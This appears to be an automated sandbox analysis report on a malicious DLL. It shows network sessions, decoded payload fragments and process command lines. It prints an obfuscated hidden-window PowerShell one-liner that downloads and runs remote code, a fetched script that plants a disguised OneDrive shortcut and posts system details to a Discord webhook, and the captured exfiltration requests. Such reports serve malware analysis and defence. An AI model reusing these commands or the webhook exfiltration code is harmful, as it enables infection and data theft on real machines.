                                                                2024-10-15 14:00:48 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 14:00:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.752167185.199.109.1334434240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:49 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:50 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:50 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210135-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000850.011162,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: fa5cd381cd56296653d2b95f0aa292b0692fc59d
                                                                Expires: Tue, 15 Oct 2024 14:05:50 GMT
                                                                Source-Age: 55
                                                                2024-10-15 14:00:50 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:50 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:50 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:50 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:50 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:50 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.752203162.159.128.2334435844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:56 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:56 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:00:56 UTC1255INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:00:56 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729000858
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6y58N4G5xhAgAclsfELCL4vYMRL1dKLmEvZXbltV4xX19%2FhCtyXpYRGPBjcKQ5TtSYREctGH3loQD%2BPgaBAbSgrIHIQuhaS4fs00DsgobwUohjmmH%2BmdDlm2kXPO"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=d07a2d7a7b163eb2bc363103be6664bc28dedd8c-1729000856; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=Ocy6fJkJWJMC268ZWVFfxA560vcYtEIVLj3zT5Ch5e4-1729000856906-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d30569aef302e4f-DFW
                                                                2024-10-15 14:00:56 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.752206162.159.128.2334434240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:01:03 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:01:03 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:01:03 UTC1249INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:01:03 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729000864
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LReTUnDSklWN7n3iLQZ47m8pDvQX5LtLL8aaRSBCMArXkzeFEPdeyEIZYkR8FZknc4iaJ7BLYKWhcNSOWj1wHubkLuzLZuu6bRaQEdruclb7HAj2SnqHt5lz3i5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=19b26d61e8d421bc0ea94327663eea862e775528-1729000863; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=sM1EwP2ChVVZeJ5tLOr_.50bQMwiRTG113ZViG8DWmM-1729000863431-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d3056c3cf0ae82f-DFW
                                                                2024-10-15 14:01:03 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:10:00:02
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll"
                                                                Imagebase:0x7ff719d70000
                                                                File size:165'888 bytes
                                                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:10:00:02
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
                                                                Imagebase:0x7ff699860000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
                                                                Imagebase:0x7ff7eaa10000
                                                                File size:25'088 bytes
                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
                                                                Imagebase:0x7ff7279f0000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer
                                                                Imagebase:0x7ff7279f0000
                                                                File size:71'680 bytes
                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:10:00:03
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:10:00:06
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:10:00:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                Imagebase:0x7ff6ef590000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:10:00:35
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\attrib.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                Imagebase:0x7ff6ef590000
                                                                File size:23'040 bytes
                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
